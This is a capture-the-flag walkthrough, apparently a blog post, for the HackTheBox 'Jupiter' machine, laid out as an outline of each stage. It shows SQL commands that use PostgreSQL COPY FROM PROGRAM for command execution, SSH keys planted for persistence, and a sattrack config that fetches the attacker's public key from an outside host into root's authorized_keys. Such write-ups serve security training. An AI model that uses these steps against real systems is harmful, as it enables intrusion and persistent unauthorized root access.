Home Jupiter Report
Post
Cancel

Jupiter Report

Information gathering



Scope: 10.10.11.216/32 (Linux)

TCP Nmap scan: 65,535 ports

Vulnerability Assesment



Exploitation



  • PostgreSQLi
    • DROP TABLE IF EXISTS cmd_rce;
    • CREATE TABLE cmd_rce(cmd_out text);
    • COPY cmd_rce FROM PROGRAM ‘id’;
    • SELECT * FROM cmd_rce;

Post-exploitation



  • System User Shell (postgress)
    • Enumeration
      • Process (pspy.sh)
        • Juno user cron job
        • Shadow simulation (/home/juno/shadow-simulation.sh)
          • Shadow directly executes real, unmodified application binaries natively in Linux as standard OS processes (using vfork() and execvpe()): we call these processes executed by Shadow managed processes.
          • Example: (Basic File Transfer)
          • We have write access to network-simulation.yml (-rw-rw-rw- 1 juno juno 815 Mar 7 2023 /dev/shm/network-simulation.yml)
  • Juno user
    • Enumeration
      • Process (jovian /usr/bin/python3 /usr/local/bin/jupyter-notebook –no-browser /opt/solar-flares/flares.ipynb)
      • Juno group: science
        • Group permissions: drwxrwx— 4 jovian science 4096 May 4 18:59 /opt/solar-flares
      • Jupyter Notebook is running on default port 8888
        • Access with Local Port Forwarding in SSH
          • Access token Enabled
        • Searchings recent logs (Token leaked)
        • Jovian JUpyter Notebookacces (Free Remote code execution)
  • Jovian user
    • Enumeration
      • Binary execution policy ((ALL) NOPASSWD: /usr/local/bin/sattrack)
        • Sattrack: Satellite tracking software for linux
        • Documentation options
          • tlesources: A array of URLs to curl get into tleroot
          • tleroot: Location to get and load TLE files
          • tlefile: TLE filename to load from tleroot

Lateral movement



  • Pivot to Juno user (network-simulation.yml)
    • Add our id_rsa.pub to juno authorized keys nad log with ssh (Persistence)
  • Pivot user Jovian (Jupyter notebook access)
  • Pivot to Root
    • Request our id_rsa.pub to root authorized_keys file
      • tlesources: http://10.10.15.5/id_rsa.pub
      • tleroot: /root/.ssh
      • tlefile: authorized_keys

Proof of concept



This post is licensed under CC BY 4.0 by the author.